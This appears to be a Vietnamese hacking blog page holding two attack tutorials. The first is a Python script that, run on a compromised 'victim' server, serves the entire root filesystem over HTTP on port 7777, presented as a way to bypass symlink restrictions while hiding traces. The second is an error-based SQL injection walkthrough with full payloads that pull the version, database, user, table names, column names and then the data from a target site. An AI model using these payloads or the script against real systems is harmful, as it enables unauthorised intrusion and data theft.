<div dir="ltr" style="text-align: left;" trbidi="on"> <span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Đầu tiên mọi người có thể kiểm tra xem có gói python đc cài trên server chưa<br />dùng lệnh python -h xem có trả về kết quả gì ko nè.<br /><a href="http://www.blogger.com/null"></a><br />Nếu có chạy thì tạo đoạn code python sau lưu vào file capuchino.py<br /></span><blockquote class="tr_bq"> <span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">#!/usr/bin/env python</span><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"># Bypass for (c) 2013</span><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">import SimpleHTTPServer</span><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">import SocketServer</span><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">import os</span><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">port = 7777</span><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">if __name__=='__main__':</span><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">os.chdir('/')</span><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Handler = SimpleHTTPServer.SimpleHTTPRequestHandler</span><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">httpd = SocketServer.TCPServer(("", port), Handler)</span><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">print("Now open this server on webbrowser at port : " + str(port))</span><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">print("example: http://maho.com:" + str(port))</span><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">httpd.serve_forever()</span></blockquote> <span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /><br /><br /><br /><br />Sau đó chạy nó python capuchino.py<br /><br />rồi kiểm tra kết quả :victim:7777<br /><br />Cách này có thể giấu đc kết quả thực hiện sym trên server</span></div>

Sym root bypass open port nếu server cho chạy python

Đầu tiên mọi người có thể kiểm tra xem có gói python đc cài trên server chưa dùng lệnh python -h xem có trả về kết quả gì ko nè. Nếu có chạ...

Read More »

[TUT] Khai thác lỗi SQL Injection dạng error-based quick blind

<div dir="ltr" style="text-align: left;" trbidi="on"> <span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Ví dụ victim có dạng:<br /><br />http://target.com/page.php?id = 1<br /><br />Lệnh get version, database<br /><br />http://target.com/page.php?id = 1 [color=#ffffffff]And (Select 1 From(Select Count(*),Concat(CHAR (124),(Select Concat(version(),0x7c,database(),0x7c,user())),floor(rAnd(0)*2),CHAR (124))x From Information_Schema.Tables Group By x)a)[/color]<br /><br />Tương tự vậy, lệnh get table:<br /><br />And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select substr(Group_concat(table_name),1,145) FROM information_schema.tables where table_schema=database()),floor(rAnd(0)*2), CHAR (124))x FROM Information_Schema.Tables Group By x)a)<br /><br />Bạn để ý chỗ 1,145…Tăng số 1 đó thành một số lớn hơn (thường là số ký tự được trả ra trong dấu ngoặc kép sau phần duplicate entrie….)<br /><br />And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select substr(Group_concat(table_name),63,145) FROM information_schema.tables where table_schema=database()),floor(rAnd(0)*2), CHAR (124))x FROM Information_Schema.Tables Group By x)a)<br /><br />Tiếp theo, lấy column của một table nào đó<br /><br />And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select substr(Group_concat(column_name),1,145) FROM information_schema.columns where table_schema=database() and table_name=0xso_hex_cua_tablename) ,floor(rAnd(0)*2), CHAR (124))x FROM Information_Schema.Tables Group By x)a)<br /><br />Tăng số 1 theo nguyên tắc như trên.<br /><br />Và cuối cùng là dữ liệu:<br /><br />And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select substr(Group_concat(column_name_1,0x7c,column_name_2),1,145) FROM table_name_nao_do) ,floor(rAnd(0)*2), CHAR (124))x FROM Information_Schema.Tables Group By x)a)<br /><br />CEH</span></div>

[TUT] Khai thác lỗi SQL Injection dạng error-based quick blind

Ví dụ victim có dạng: http://target.com/page.php?id = 1 Lệnh get version, database http://target.com/page.php?id = 1 [color=#ffffffff]And (...

Read More »